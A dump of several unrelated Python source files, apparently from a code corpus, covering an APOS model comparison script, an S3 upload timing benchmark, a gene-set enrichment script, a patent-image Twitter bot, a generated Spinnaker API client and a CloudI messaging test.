return m_states[:,:,-2]
else:
return y
# Save this model to a path.
def save(self, path):
import json
with open(path, "w") as f:
# Get the config as a Python type.
if (self.config is None): config = None
else: config = {n:getattr(self.config, n) for (n,t) in self.config._fields_}
# Write the JSON file with Python types.
f.write(json.dumps({
# Create a dictionary of the known python attributes.
"config" : config,
"model" : self.model.tolist(),
"record" : self.record.tolist(),
"xi_map" : [l.tolist() for l in self.xi_map],
"xi_sizes" : self.xi_sizes,
"xi_starts" : self.xi_starts,
"axi_map" : [l.tolist() for l in self.axi_map],
"axi_sizes" : self.axi_sizes,
"axi_starts" : self.axi_starts,
"yi_map" : [l.tolist() for l in self.yi_map],
"yi_sizes" : self.yi_sizes,
"yi_starts" : self.yi_starts,
}))
# Load this model from a path (after having been saved).
def load(self, path):
# Read the file.
import json
with open(path, "r") as f:
attrs = json.loads(f.read())
# Load the attributes of the model.
for key in attrs:
value = attrs[key]
if (key[-4:] == "_map"):
value = [np.asarray(l) for l in value]
elif (key[:2] in {"xi_","axi_","yi_"}):
pass
elif (type(value) is list):
value = np.asarray(value, dtype="float32")
setattr(self, key, value)
        # Convert the dictionary configuration into the correct type.
if (type(self.config) is dict):
self.config = self.APOS.MODEL_CONFIG(**self.config)
# Return self in case an assignment was made.
return self
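# A minimal usage sketch (illustrative only, kept as comments so it does not run
# as part of the comparison script below; it assumes the APOS constructor works
# with defaults -- pass "source=..." as in the calls below if a specific Fortran
# file is required):
#
#   model = APOS(seed=0)
#   x_demo = np.random.random(size=(32, 4)).astype("float32")
#   y_demo = np.random.random(size=(32, 1)).astype("float32")
#   model.fit(x=x_demo, y=y_demo, steps=100)
#   y_pred = model.predict(x=x_demo)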
import fmodpy
fmodpy.config.f_compiler_args = "-fPIC -shared -O3 -fcheck=bounds"
np.random.seed(0)
# m = 10
# kwargs = dict(
# adn = 3*m,
# ane = 8*m,
# ans = 2*m,
# ads = 2*m,
# ado = 3*m,
# mdn = 5*m,
# mne = 24*m,
# mns = 2*m,
# mds = 3*m,
# mdo = 2*m,
# seed = 0,
# num_threads = 1,
# )
# aold = APOS(source="apos_0-0-15.f90", name="apos_old", **kwargs)
# anew = APOS(source="apos_0-0-19.f90", name="apos_new", **kwargs)
# an = 200
# mn = 100
# nec = 2 # num embedding columns
# sizes = np.ones(mn, dtype=np.int32) * max(1,an // mn)
# sizes[-1] = an - sum(sizes[:-1])
# ax = np.random.random(size=(an, aold.config.adn)).astype(np.float32)
# axi = np.random.randint(1, aold.config.ane // nec, size=(an,nec))
# x = np.random.random(size=(mn, aold.config.mdn)).astype(np.float32)
# xi = np.random.randint(1, aold.config.mne // nec, size=(mn,nec))
# y = np.random.random(size=(mn, aold.config.mdo)).astype(np.float32)
aold = APOS(source="apos_0-0-15.f90", name="apos_old", seed=0, num_threads=1)
anew = APOS(source="apos_0-0-19.f90", name="apos_new", seed=0, num_threads=1)
from tlux.random import well_spaced_box
n = 100
# A function for testing approximation algorithms.
def f(x):
x = x.reshape((-1,2))
x, y = x[:,0], x[:,1]
return (3*x + np.cos(8*x)/2 + np.sin(5*y))
x = well_spaced_box(n, 2)
y = f(x)
y = np.concatenate((y, np.cos(np.linalg.norm(x,axis=1))), axis=0).reshape(-1,1)
# Create all data.
xi = np.concatenate((np.ones(len(x)),2*np.ones(len(x)))).reshape((-1,1)).astype("int32")
ax = np.concatenate((x, x), axis=0).reshape((-1,1)).copy()
axi = (np.ones(ax.shape, dtype="int32").reshape((xi.shape[0],-1)) * (np.arange(xi.shape[1])+1)).reshape(-1,1)
sizes = np.ones(xi.shape[0], dtype="int32") * 2
x = np.zeros((xi.shape[0], 0), dtype="float32", order="C")
# Initialize the models.
aold.fit(ax=ax.copy(), axi=axi, sizes=sizes, x=x.copy(), xi=xi, y=y.copy(), steps=0, num_threads=1)
anew.fit(ax=ax.copy(), axi=axi, sizes=sizes, x=x.copy(), xi=xi, y=y.copy(), steps=0, num_threads=1)
print()
print(aold)
# print(aold.unpack().__str__(vecs=True))
print()
print(anew)
# print(anew.unpack().__str__(vecs=True))
print()
nv = aold.config.num_vars
print("model_difference:", max(abs(aold.model[:nv] - anew.model[:nv])))
# Make the models the same before taking a fit step.
aold.model[:nv] = anew.model[:nv]
# Set internal parameters to be similar (to control code execution path).
# aold.config.ax_normalized = False
# anew.config.ax_normalized = False
# aold.config.ay_normalized = False
# anew.config.ay_normalized = False
# aold.config.x_normalized = False
# anew.config.x_normalized = False
# aold.config.y_normalized = False
# anew.config.y_normalized = False
# aold.config.logging_step_frequency = 1
# anew.config.logging_step_frequency = 1
# anew.config.orthogonalizing_step_frequency = 100
anew.config.basis_replacement = False
# anew.config.equalize_y = False
# aold.config.encode_normalization = True
# anew.config.encode_normalization = True
aold.config.num_threads = 1
anew.config.num_threads = 1
steps = 0
ax_old = ax.copy()
x_old = x.copy()
y_old = y.copy()
aold.fit(ax=ax_old, axi=axi, sizes=sizes, x=x_old, xi=xi, y=y_old, steps=steps)
ax_new = ax.copy()
x_new = x.copy()
y_new = y.copy()
anew.fit(ax=ax_new, axi=axi, sizes=sizes, x=x_new, xi=xi, y=y_new, steps=steps)
#
print("model_difference:", max(abs(aold.model[:nv] - anew.model[:nv])))
print()
fy_old = aold(ax=ax_old.copy(), axi=axi, sizes=sizes, x=x_old.copy(), xi=xi, save_states=True)
fy_new = anew(ax=ax_new.copy(), axi=axi, sizes=sizes, x=x_new.copy(), xi=xi, save_states=True)
print("ax_difference: ", abs(ax_old - ax_new).max())
print("as_difference: ", abs(aold.a_states - anew.a_states).max())
print("ay_difference: ", abs(aold.ay - anew.ay).max())
if (x_old.size > 0):
print("x_difference: ", abs(x_old - x_new).max())
print("ms_difference: ", abs(aold.m_states - anew.m_states).max())
print("fy_difference: ", abs(fy_old - fy_new).max())
print()
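# Compare slices of the real-valued workspace (input/output shift, rescale, and
# gradient buffers, per the labels below) between the two builds.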
print("ax_shift: ", abs(aold.rwork[aold.config.aiss-1:aold.config.aise] -
anew.rwork[anew.config.aiss-1:anew.config.aise]).max())
print("ay_shift: ", abs(aold.rwork[aold.config.aoss-1:aold.config.aose] -
anew.rwork[anew.config.aoss-1:anew.config.aose]).max())
print("ay: ", abs(aold.rwork[aold.config.say-1:aold.config.eay] -
anew.rwork[anew.config.say-1:anew.config.eay]).max())
print("y_rescale: ", abs(aold.rwork[aold.config.syr-1:aold.config.eyr] -
anew.rwork[anew.config.syr-1:anew.config.eyr]).max())
print("y_gradient: ", abs(aold.rwork[aold.config.syg-1:aold.config.eyg] -
anew.rwork[anew.config.syg-1:anew.config.eyg]).max())
print()
if (aold.config.ane > 0):
print("a_embeddings: ", abs(aold.unpack().a_embeddings - anew.unpack().a_embeddings).max() )
print("a_input_vecs: ", abs(aold.unpack().a_input_vecs - anew.unpack().a_input_vecs).max() )
print("a_input_shift: ", abs(aold.unpack().a_input_shift - anew.unpack().a_input_shift).max())
print("a_state_vecs: ", abs(aold.unpack().a_state_vecs - anew.unpack().a_state_vecs).max() )
print("a_state_shift: ", abs(aold.unpack().a_state_shift - anew.unpack().a_state_shift).max())
print("a_output_vecs: ", abs(aold.unpack().a_output_vecs - anew.unpack().a_output_vecs).max())
print("m_embeddings: ", abs(aold.unpack().m_embeddings - anew.unpack().m_embeddings).max() )
print("m_input_vecs: ", abs(aold.unpack().m_input_vecs - anew.unpack().m_input_vecs).max() )
print("m_input_shift: ", abs(aold.unpack().m_input_shift - anew.unpack().m_input_shift).max())
print("m_state_vecs: ", abs(aold.unpack().m_state_vecs - anew.unpack().m_state_vecs).max() )
print("m_state_shift: ", abs(aold.unpack().m_state_shift - anew.unpack().m_state_shift).max())
print("m_output_vecs: ", abs(aold.unpack().m_output_vecs - anew.unpack().m_output_vecs).max())
print()
|
StarcoderdataPython
|
4957753
|
<filename>cloud/lab2/push.py
import boto3
from botocore.exceptions import NoCredentialsError
import time
import csv
def upload_to_aws(local_file, bucket, s3_file):
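    """Upload local_file to the S3 bucket under the key s3_file; return True on success, False on a missing file or missing credentials."""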
s3 = boto3.client('s3')
try:
s3.upload_file(local_file, bucket, s3_file)
#print("Upload Successful")
return True
except FileNotFoundError:
print("The file was not found")
return False
except NoCredentialsError:
print("Credentials not available")
return False
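# Measure S3 upload latency: for each of three regions and three file sizes,
# time repeated uploads and append one CSV row of timings per (region, size)
# pair to res.csv.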
print("Start timer")
myfile = open('res.csv', 'a')
res ="Region;Size;0;1;2;3;4;5;6;7;8;9;10;11;12;13;14;15;16;17;18;19;20;21;22;23;24;25;26;27;28;29;\n"
for k in range(3):
if(k==0):
bucket_name = 'generatedbucketashrom'
region = 'Stockholm;'
elif(k==1):
bucket_name = 'generatedbucketashromusnorth2'
region = 'Ohio;'
else:
bucket_name = 'generatedbucketashromapsoutheast2'
region = 'Sydney;'
for j in range(3):
if(j == 0):
local_file_name = './dummy_files/1MB.db'
distant_file_name = '1MB.db'
res += region + '1MB;'
elif(j==1):
local_file_name = './dummy_files/10MB.db'
distant_file_name = '10MB.db'
res+= region + '10MB;'
else:
local_file_name = './dummy_files/100MB.bin'
distant_file_name = '100MB.bin'
            res += region + '100MB;'
        for i in range(NUM_UPLOADS):
pre_upload = time.time()
uploaded = upload_to_aws(local_file_name, bucket_name, distant_file_name)
upload_time = time.time() - pre_upload
res = res + str(upload_time) + ";"
print("Uploaded file : " + region + " " + distant_file_name + " " + str(i))
res = res + "\n"
myfile.write(res)
myfile.close()
print("Stop timer")
|
StarcoderdataPython
|
12828985
|
<reponame>sreichl/genomic_region_enrichment
#!/bin/env python
import pandas as pd
import pickle
import os
import numpy as np
import gseapy as gp
# utils for manual odds ratio calculation
def overlap_converter(overlap_str, bg_n, gene_list_n):
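    """Convert an Enrichr-style "overlap/gene_set_size" string into an odds ratio relative to the background."""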
overlap_n, gene_set_n = str(overlap_str).split('/')
return odds_ratio_calc(bg_n, gene_list_n, int(gene_set_n), int(overlap_n))
def odds_ratio_calc(bg_n, gene_list_n, gene_set_n, overlap_n):
import scipy.stats as stats
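    # 2x2 contingency table of gene-set membership vs. query-list overlap; the
    # reciprocal of the Fisher odds ratio is returned so that larger values
    # indicate a larger overlap relative to the gene-set size (enrichment).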
table=np.array([[gene_set_n, bg_n-gene_set_n],[overlap_n, gene_list_n-overlap_n]])
oddsratio, pvalue = stats.fisher_exact(table)
return (1/oddsratio)
# get snakemake parameters
query_genes_path = snakemake.input['query_genes']
background_genes_path = snakemake.input['background_genes']
enrichr_databases = snakemake.input['enrichr_databases']
dir_results = snakemake.output['result_GSEApy']
# testing
# query_genes_path = '/nobackup/lab_bock/projects/bmdm-stim/results/ATAC/all/enrichment_analysis/DEA/LPS_2h_up/GREAT/GREAT_genes.txt'
# background_genes_path = '/nobackup/lab_bock/projects/bmdm-stim/results/ATAC/all/enrichment_analysis/DEA/background_genes/BMDM/GREAT_background_genes.txt'
# enrichr_databases = 'resources/enrichr_databases.pkl'
# dir_results = '/nobackup/lab_bock/projects/bmdm-stim/results/ATAC/all/enrichment_analysis/DEA/LPS_2h_up/GSEApy'
if not os.path.exists(dir_results):
os.mkdir(dir_results)
# check if GREAT/Genes.tsv exists & load or handle exception
if os.path.exists(query_genes_path):
genes = open(query_genes_path, "r")
gene_list = genes.read()
gene_list = gene_list.split('\n')
genes.close()
else:
with open(os.path.join(dir_results,"no_genes_found.txt"), 'w') as f:
f.write('no genes found')
quit()
# load background genes
bg_file = open(background_genes_path, "r")
background = bg_file.read()
background = background.split('\n')
bg_file.close()
# load database .pkl file
with open(enrichr_databases, 'rb') as f:
db_dict = pickle.load(f)
# convert gene lists to upper case
gene_list=[str(x).upper() for x in list(gene_list)]
background=[str(x).upper() for x in list(background)]
# perform enrichment of every database with GSEApy (plots are generated automatically)
bg_n = len(background)
res = dict()
for db in db_dict.keys():
res = gp.enrichr(gene_list=gene_list,
gene_sets=db_dict[db],
background=background,
# organism='mouse',
outdir=os.path.join(dir_results, db),
top_term=25,
cutoff=0.05,
format='svg',
verbose=False,
)
# move on if result is empty
if res.results.shape[0]==0:
continue
# annotate used gene set
res.results['Gene_set'] = db
# odds ratio calculation
gene_list_n=len(gene_list)
res.results['Odds Ratio'] = res.results['Overlap'].apply(overlap_converter, args=(bg_n, gene_list_n))
# separate export
res.results.to_csv(os.path.join(dir_results, db, "Enrichr_{}.csv".format(db)))
|
StarcoderdataPython
|
11308513
|
import tweepy
import sqlite3
import os
import tempfile
from PIL import Image
import twitter_credentials
auth = tweepy.OAuthHandler(twitter_credentials.consumer_key, twitter_credentials.consumer_secret)
auth.set_access_token(twitter_credentials.access_token_key, twitter_credentials.access_token_secret)
api = tweepy.API(auth)
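# Pick a random image from the catalogue that has not been tweeted yet, post it
# with its patent title via a temporary PNG copy, then mark it as tweeted.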
db = sqlite3.connect('./catalogue.db')
c = db.cursor()
c.execute('SELECT * FROM image INNER JOIN patent ON patent.id = image.patent_id WHERE tweeted=0 ORDER BY random() LIMIT 1')
r = c.fetchone()
fname = os.path.join('patents', r[4], r[0])
title = r[7]
handle, dest_fname = tempfile.mkstemp('.png')
os.close(handle)
image = Image.open(fname)
image.save(dest_fname)
api.update_with_media(dest_fname, title)
c.execute('UPDATE image SET tweeted=1 WHERE filename=?', [r[0]])
db.commit()
os.remove(dest_fname)
|
StarcoderdataPython
|
1743354
|
<filename>spinnaker_swagger_client/api/task_controller_api.py<gh_stars>0
# coding: utf-8
"""
Spinnaker API
No description provided (generated by Swagger Codegen https://github.com/swagger-api/swagger-codegen) # noqa: E501
OpenAPI spec version: 1.0.0
Generated by: https://github.com/swagger-api/swagger-codegen.git
"""
from __future__ import absolute_import
import re # noqa: F401
# python 2 and python 3 compatibility library
import six
from spinnaker_swagger_client.api_client import ApiClient
class TaskControllerApi(object):
"""NOTE: This class is auto generated by the swagger code generator program.
Do not edit the class manually.
Ref: https://github.com/swagger-api/swagger-codegen
"""
def __init__(self, api_client=None):
if api_client is None:
api_client = ApiClient()
self.api_client = api_client
def cancel_task_using_put1(self, id, **kwargs): # noqa: E501
"""Cancel task # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.cancel_task_using_put1(id, async_req=True)
>>> result = thread.get()
:param async_req bool
:param str id: id (required)
:return: dict(str, object)
If the method is called asynchronously,
returns the request thread.
"""
kwargs['_return_http_data_only'] = True
if kwargs.get('async_req'):
return self.cancel_task_using_put1_with_http_info(id, **kwargs) # noqa: E501
else:
(data) = self.cancel_task_using_put1_with_http_info(id, **kwargs) # noqa: E501
return data
def cancel_task_using_put1_with_http_info(self, id, **kwargs): # noqa: E501
"""Cancel task # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.cancel_task_using_put1_with_http_info(id, async_req=True)
>>> result = thread.get()
:param async_req bool
:param str id: id (required)
:return: dict(str, object)
If the method is called asynchronously,
returns the request thread.
"""
all_params = ['id'] # noqa: E501
all_params.append('async_req')
all_params.append('_return_http_data_only')
all_params.append('_preload_content')
all_params.append('_request_timeout')
params = locals()
for key, val in six.iteritems(params['kwargs']):
if key not in all_params:
raise TypeError(
"Got an unexpected keyword argument '%s'"
" to method cancel_task_using_put1" % key
)
params[key] = val
del params['kwargs']
# verify the required parameter 'id' is set
if ('id' not in params or
params['id'] is None):
raise ValueError("Missing the required parameter `id` when calling `cancel_task_using_put1`") # noqa: E501
collection_formats = {}
path_params = {}
if 'id' in params:
path_params['id'] = params['id'] # noqa: E501
query_params = []
header_params = {}
form_params = []
local_var_files = {}
body_params = None
# HTTP header `Accept`
header_params['Accept'] = self.api_client.select_header_accept(
['*/*']) # noqa: E501
# HTTP header `Content-Type`
header_params['Content-Type'] = self.api_client.select_header_content_type( # noqa: E501
['application/json']) # noqa: E501
# Authentication setting
auth_settings = [] # noqa: E501
return self.api_client.call_api(
'/tasks/{id}/cancel', 'PUT',
path_params,
query_params,
header_params,
body=body_params,
post_params=form_params,
files=local_var_files,
response_type='dict(str, object)', # noqa: E501
auth_settings=auth_settings,
async_req=params.get('async_req'),
_return_http_data_only=params.get('_return_http_data_only'),
_preload_content=params.get('_preload_content', True),
_request_timeout=params.get('_request_timeout'),
collection_formats=collection_formats)
def cancel_tasks_using_put(self, ids, **kwargs): # noqa: E501
"""Cancel tasks # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.cancel_tasks_using_put(ids, async_req=True)
>>> result = thread.get()
:param async_req bool
:param list[str] ids: ids (required)
:return: dict(str, object)
If the method is called asynchronously,
returns the request thread.
"""
kwargs['_return_http_data_only'] = True
if kwargs.get('async_req'):
return self.cancel_tasks_using_put_with_http_info(ids, **kwargs) # noqa: E501
else:
(data) = self.cancel_tasks_using_put_with_http_info(ids, **kwargs) # noqa: E501
return data
def cancel_tasks_using_put_with_http_info(self, ids, **kwargs): # noqa: E501
"""Cancel tasks # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.cancel_tasks_using_put_with_http_info(ids, async_req=True)
>>> result = thread.get()
:param async_req bool
:param list[str] ids: ids (required)
:return: dict(str, object)
If the method is called asynchronously,
returns the request thread.
"""
all_params = ['ids'] # noqa: E501
all_params.append('async_req')
all_params.append('_return_http_data_only')
all_params.append('_preload_content')
all_params.append('_request_timeout')
params = locals()
for key, val in six.iteritems(params['kwargs']):
if key not in all_params:
raise TypeError(
"Got an unexpected keyword argument '%s'"
" to method cancel_tasks_using_put" % key
)
params[key] = val
del params['kwargs']
# verify the required parameter 'ids' is set
if ('ids' not in params or
params['ids'] is None):
raise ValueError("Missing the required parameter `ids` when calling `cancel_tasks_using_put`") # noqa: E501
collection_formats = {}
path_params = {}
query_params = []
if 'ids' in params:
query_params.append(('ids', params['ids'])) # noqa: E501
collection_formats['ids'] = 'multi' # noqa: E501
header_params = {}
form_params = []
local_var_files = {}
body_params = None
# HTTP header `Accept`
header_params['Accept'] = self.api_client.select_header_accept(
['*/*']) # noqa: E501
# HTTP header `Content-Type`
header_params['Content-Type'] = self.api_client.select_header_content_type( # noqa: E501
['application/json']) # noqa: E501
# Authentication setting
auth_settings = [] # noqa: E501
return self.api_client.call_api(
'/tasks/cancel', 'PUT',
path_params,
query_params,
header_params,
body=body_params,
post_params=form_params,
files=local_var_files,
response_type='dict(str, object)', # noqa: E501
auth_settings=auth_settings,
async_req=params.get('async_req'),
_return_http_data_only=params.get('_return_http_data_only'),
_preload_content=params.get('_preload_content', True),
_request_timeout=params.get('_request_timeout'),
collection_formats=collection_formats)
def delete_task_using_delete(self, id, **kwargs): # noqa: E501
"""Delete task # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.delete_task_using_delete(id, async_req=True)
>>> result = thread.get()
:param async_req bool
:param str id: id (required)
:return: dict(str, object)
If the method is called asynchronously,
returns the request thread.
"""
kwargs['_return_http_data_only'] = True
if kwargs.get('async_req'):
return self.delete_task_using_delete_with_http_info(id, **kwargs) # noqa: E501
else:
(data) = self.delete_task_using_delete_with_http_info(id, **kwargs) # noqa: E501
return data
def delete_task_using_delete_with_http_info(self, id, **kwargs): # noqa: E501
"""Delete task # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.delete_task_using_delete_with_http_info(id, async_req=True)
>>> result = thread.get()
:param async_req bool
:param str id: id (required)
:return: dict(str, object)
If the method is called asynchronously,
returns the request thread.
"""
all_params = ['id'] # noqa: E501
all_params.append('async_req')
all_params.append('_return_http_data_only')
all_params.append('_preload_content')
all_params.append('_request_timeout')
params = locals()
for key, val in six.iteritems(params['kwargs']):
if key not in all_params:
raise TypeError(
"Got an unexpected keyword argument '%s'"
" to method delete_task_using_delete" % key
)
params[key] = val
del params['kwargs']
# verify the required parameter 'id' is set
if ('id' not in params or
params['id'] is None):
raise ValueError("Missing the required parameter `id` when calling `delete_task_using_delete`") # noqa: E501
collection_formats = {}
path_params = {}
if 'id' in params:
path_params['id'] = params['id'] # noqa: E501
query_params = []
header_params = {}
form_params = []
local_var_files = {}
body_params = None
# HTTP header `Accept`
header_params['Accept'] = self.api_client.select_header_accept(
['*/*']) # noqa: E501
# Authentication setting
auth_settings = [] # noqa: E501
return self.api_client.call_api(
'/tasks/{id}', 'DELETE',
path_params,
query_params,
header_params,
body=body_params,
post_params=form_params,
files=local_var_files,
response_type='dict(str, object)', # noqa: E501
auth_settings=auth_settings,
async_req=params.get('async_req'),
_return_http_data_only=params.get('_return_http_data_only'),
_preload_content=params.get('_preload_content', True),
_request_timeout=params.get('_request_timeout'),
collection_formats=collection_formats)
def get_task_details_using_get1(self, id, task_details_id, **kwargs): # noqa: E501
"""Get task details # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.get_task_details_using_get1(id, task_details_id, async_req=True)
>>> result = thread.get()
:param async_req bool
:param str id: id (required)
:param str task_details_id: taskDetailsId (required)
:param str x_rate_limit_app: X-RateLimit-App
:return: dict(str, object)
If the method is called asynchronously,
returns the request thread.
"""
kwargs['_return_http_data_only'] = True
if kwargs.get('async_req'):
return self.get_task_details_using_get1_with_http_info(id, task_details_id, **kwargs) # noqa: E501
else:
(data) = self.get_task_details_using_get1_with_http_info(id, task_details_id, **kwargs) # noqa: E501
return data
def get_task_details_using_get1_with_http_info(self, id, task_details_id, **kwargs): # noqa: E501
"""Get task details # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.get_task_details_using_get1_with_http_info(id, task_details_id, async_req=True)
>>> result = thread.get()
:param async_req bool
:param str id: id (required)
:param str task_details_id: taskDetailsId (required)
:param str x_rate_limit_app: X-RateLimit-App
:return: dict(str, object)
If the method is called asynchronously,
returns the request thread.
"""
all_params = ['id', 'task_details_id', 'x_rate_limit_app'] # noqa: E501
all_params.append('async_req')
all_params.append('_return_http_data_only')
all_params.append('_preload_content')
all_params.append('_request_timeout')
params = locals()
for key, val in six.iteritems(params['kwargs']):
if key not in all_params:
raise TypeError(
"Got an unexpected keyword argument '%s'"
" to method get_task_details_using_get1" % key
)
params[key] = val
del params['kwargs']
# verify the required parameter 'id' is set
if ('id' not in params or
params['id'] is None):
raise ValueError("Missing the required parameter `id` when calling `get_task_details_using_get1`") # noqa: E501
# verify the required parameter 'task_details_id' is set
if ('task_details_id' not in params or
params['task_details_id'] is None):
raise ValueError("Missing the required parameter `task_details_id` when calling `get_task_details_using_get1`") # noqa: E501
collection_formats = {}
path_params = {}
if 'id' in params:
path_params['id'] = params['id'] # noqa: E501
if 'task_details_id' in params:
path_params['taskDetailsId'] = params['task_details_id'] # noqa: E501
query_params = []
header_params = {}
if 'x_rate_limit_app' in params:
header_params['X-RateLimit-App'] = params['x_rate_limit_app'] # noqa: E501
form_params = []
local_var_files = {}
body_params = None
# HTTP header `Accept`
header_params['Accept'] = self.api_client.select_header_accept(
['*/*']) # noqa: E501
# Authentication setting
auth_settings = [] # noqa: E501
return self.api_client.call_api(
'/tasks/{id}/details/{taskDetailsId}', 'GET',
path_params,
query_params,
header_params,
body=body_params,
post_params=form_params,
files=local_var_files,
response_type='dict(str, object)', # noqa: E501
auth_settings=auth_settings,
async_req=params.get('async_req'),
_return_http_data_only=params.get('_return_http_data_only'),
_preload_content=params.get('_preload_content', True),
_request_timeout=params.get('_request_timeout'),
collection_formats=collection_formats)
def get_task_using_get1(self, id, **kwargs): # noqa: E501
"""Get task # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.get_task_using_get1(id, async_req=True)
>>> result = thread.get()
:param async_req bool
:param str id: id (required)
:return: dict(str, object)
If the method is called asynchronously,
returns the request thread.
"""
kwargs['_return_http_data_only'] = True
if kwargs.get('async_req'):
return self.get_task_using_get1_with_http_info(id, **kwargs) # noqa: E501
else:
(data) = self.get_task_using_get1_with_http_info(id, **kwargs) # noqa: E501
return data
def get_task_using_get1_with_http_info(self, id, **kwargs): # noqa: E501
"""Get task # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.get_task_using_get1_with_http_info(id, async_req=True)
>>> result = thread.get()
:param async_req bool
:param str id: id (required)
:return: dict(str, object)
If the method is called asynchronously,
returns the request thread.
"""
all_params = ['id'] # noqa: E501
all_params.append('async_req')
all_params.append('_return_http_data_only')
all_params.append('_preload_content')
all_params.append('_request_timeout')
params = locals()
for key, val in six.iteritems(params['kwargs']):
if key not in all_params:
raise TypeError(
"Got an unexpected keyword argument '%s'"
" to method get_task_using_get1" % key
)
params[key] = val
del params['kwargs']
# verify the required parameter 'id' is set
if ('id' not in params or
params['id'] is None):
raise ValueError("Missing the required parameter `id` when calling `get_task_using_get1`") # noqa: E501
collection_formats = {}
path_params = {}
if 'id' in params:
path_params['id'] = params['id'] # noqa: E501
query_params = []
header_params = {}
form_params = []
local_var_files = {}
body_params = None
# HTTP header `Accept`
header_params['Accept'] = self.api_client.select_header_accept(
['*/*']) # noqa: E501
# Authentication setting
auth_settings = [] # noqa: E501
return self.api_client.call_api(
'/tasks/{id}', 'GET',
path_params,
query_params,
header_params,
body=body_params,
post_params=form_params,
files=local_var_files,
response_type='dict(str, object)', # noqa: E501
auth_settings=auth_settings,
async_req=params.get('async_req'),
_return_http_data_only=params.get('_return_http_data_only'),
_preload_content=params.get('_preload_content', True),
_request_timeout=params.get('_request_timeout'),
collection_formats=collection_formats)
def task_using_post1(self, map, **kwargs): # noqa: E501
"""Create task # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.task_using_post1(map, async_req=True)
>>> result = thread.get()
:param async_req bool
:param object map: map (required)
:return: dict(str, object)
If the method is called asynchronously,
returns the request thread.
"""
kwargs['_return_http_data_only'] = True
if kwargs.get('async_req'):
return self.task_using_post1_with_http_info(map, **kwargs) # noqa: E501
else:
(data) = self.task_using_post1_with_http_info(map, **kwargs) # noqa: E501
return data
def task_using_post1_with_http_info(self, map, **kwargs): # noqa: E501
"""Create task # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.task_using_post1_with_http_info(map, async_req=True)
>>> result = thread.get()
:param async_req bool
:param object map: map (required)
:return: dict(str, object)
If the method is called asynchronously,
returns the request thread.
"""
all_params = ['map'] # noqa: E501
all_params.append('async_req')
all_params.append('_return_http_data_only')
all_params.append('_preload_content')
all_params.append('_request_timeout')
params = locals()
for key, val in six.iteritems(params['kwargs']):
if key not in all_params:
raise TypeError(
"Got an unexpected keyword argument '%s'"
" to method task_using_post1" % key
)
params[key] = val
del params['kwargs']
# verify the required parameter 'map' is set
if ('map' not in params or
params['map'] is None):
raise ValueError("Missing the required parameter `map` when calling `task_using_post1`") # noqa: E501
collection_formats = {}
path_params = {}
query_params = []
header_params = {}
form_params = []
local_var_files = {}
body_params = None
if 'map' in params:
body_params = params['map']
# HTTP header `Accept`
header_params['Accept'] = self.api_client.select_header_accept(
['*/*']) # noqa: E501
# HTTP header `Content-Type`
header_params['Content-Type'] = self.api_client.select_header_content_type( # noqa: E501
['application/json']) # noqa: E501
# Authentication setting
auth_settings = [] # noqa: E501
return self.api_client.call_api(
'/tasks', 'POST',
path_params,
query_params,
header_params,
body=body_params,
post_params=form_params,
files=local_var_files,
response_type='dict(str, object)', # noqa: E501
auth_settings=auth_settings,
async_req=params.get('async_req'),
_return_http_data_only=params.get('_return_http_data_only'),
_preload_content=params.get('_preload_content', True),
_request_timeout=params.get('_request_timeout'),
collection_formats=collection_formats)
|
StarcoderdataPython
|
6693929
|
<reponame>CloudI/CloudI<filename>src/tests/messaging/messaging.py<gh_stars>100-1000
#!/usr/bin/env python
#-*-Mode:python;coding:utf-8;tab-width:4;c-basic-offset:4;indent-tabs-mode:()-*-
# ex: set ft=python fenc=utf-8 sts=4 ts=4 sw=4 et nomod:
#
# MIT License
#
# Copyright (c) 2012-2021 <NAME> <<EMAIL>>
#
# Permission is hereby granted, free of charge, to any person obtaining a
# copy of this software and associated documentation files (the "Software"),
# to deal in the Software without restriction, including without limitation
# the rights to use, copy, modify, merge, publish, distribute, sublicense,
# and/or sell copies of the Software, and to permit persons to whom the
# Software is furnished to do so, subject to the following conditions:
#
# The above copyright notice and this permission notice shall be included in
# all copies or substantial portions of the Software.
#
# THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR
# IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,
# FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE
# AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER
# LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING
# FROM, OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER
# DEALINGS IN THE SOFTWARE.
#
"""
Messaging Integration Test with Python
"""
from __future__ import print_function
import sys
import threading
import traceback
from cloudi import API, TerminateException
class Task(threading.Thread):
"""
messaging thread task
"""
def __init__(self, thread_index, name, terminate):
threading.Thread.__init__(self)
self.__api = None
self.__thread_index = thread_index
self.__name = name
self.__terminate_exception = terminate
def run(self):
"""
run the messaging thread
"""
try:
self.__api = API(self.__thread_index)
self.__api.subscribe('a/b/c/d', self.__sequence1_abcd)
self.__api.subscribe('a/b/c/*', self.__sequence1_abc_)
self.__api.subscribe('a/b/*/d', self.__sequence1_ab_d)
self.__api.subscribe('a/*/c/d', self.__sequence1_a_cd)
self.__api.subscribe('*/b/c/d', self.__sequence1__bcd)
